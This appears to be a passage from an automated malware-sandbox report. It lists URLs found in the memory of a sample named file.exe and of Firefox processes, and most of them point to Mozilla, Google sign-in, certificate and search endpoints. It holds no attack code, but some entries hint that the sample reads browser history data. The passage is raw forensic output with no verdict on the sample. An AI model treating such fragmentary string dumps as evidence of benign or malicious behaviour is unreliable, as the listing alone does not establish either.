Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/wr2.crt0
Source: firefox.exe, 00000021.00000003.3129026786.0000016DEA271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6692000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2972558086.0000016DDCEE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9AE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3027607728.0000016DDCEC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2971937157.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2885924546.0000016DDF1D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2974335700.0000016DDCE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2835528969.0000016DDCED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3188019102.0000016DE9DCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2981497838.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3035113708.0000016DDA6FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2971937157.0000016DDCE8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2885924546.0000016DDF13D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3184567289.0000016DDC9A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2913893006.0000016DDCEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2967575994.0000016DE0495000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3222691378.0000016DDC9A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://o.pki.goog/wr20%
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA3BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0(
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0d
Source: firefox.exe, 00000021.00000003.3211240177.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202842273.0000016DEA873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA3BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161712087.0000016DE4BCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE67AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000021.00000003.3203517342.0000016DEA3FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE662C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161712087.0000016DE4BCC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: file.exe, file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000021.00000003.2883300923.0000016DDF269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2880752425.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2863559755.0000016DDF4D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF242000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2887374046.0000016DDF065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000021.00000003.2883300923.0000016DDF269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2467696614.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://149349728.v2.pressablecdn.com/wp-content/uploads/2024/06/nikita-shirokov-0C0scqtrthY-unsplas
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE975F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://accounts.google.com
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/1
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_s
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/favicon.ico
Source: firefox.exe, 00000021.00000003.3210615866.0000016DEA8F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202170893.0000016DECCE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3218814454.0000016DECCEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport
Source: firefox.exe, 00000021.00000003.3202170893.0000016DECCE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3218814454.0000016DECCEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport)
Source: firefox.exe, 00000021.00000003.3202373857.0000016DECCDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210911621.0000016DEA8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport/allowlist
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/_/AccountsSignInUi/cspreport;
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3223621375.0000016DEE3D3000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr, WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fa
Source: firefox.exe, 00000021.00000003.2866313930.0000016DDE1FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: firefox.exe, 00000021.00000003.3158429296.0000016DE9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE978E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=1.0.0&encp=HF3vIpkY7RcdjpkX4Z8Yfplmfp8kfZ8m7ncqjna
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=1.0.0&encp=HF3vIpkX7RcdjpkX4Z8Yfplmfp8kfZ8m7ncqjnaz7nIZgGeY
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000021.00000003.3199884339.0000016DEE272000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202097868.0000016DEE20F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000021.00000003.3176517857.0000016DECDEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000021.00000003.3183814001.0000016DDC990000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161465579.0000016DE4BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE6790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3204782382.0000016DE9E4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/boq-infra/identity-boq-js-css-signers
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/AccountsSignInUi
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/boq-infra/identity-boq-js-css-signers
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube_main
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d1n0c1ufntxbvh.cloudfront.net/photo/eabcdc61/98254/1200x/
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/HTTP/Headers/Set-Cookie/SameSite
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE66BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://download.mozilla.org/?product=firefox-127.0-complete&os=win64&lang=en-US
Source: firefox.exe, 00000021.00000003.3203517342.0000016DEA3FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207334568.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3190357375.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3167800992.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://eat.hungryroot.com/hungryroot-reset?utm_medium=paid
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://electricliterature.com/8-novels-about-the-dangerous-pursuit-of-youth-and-beauty/?utm_source=
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net
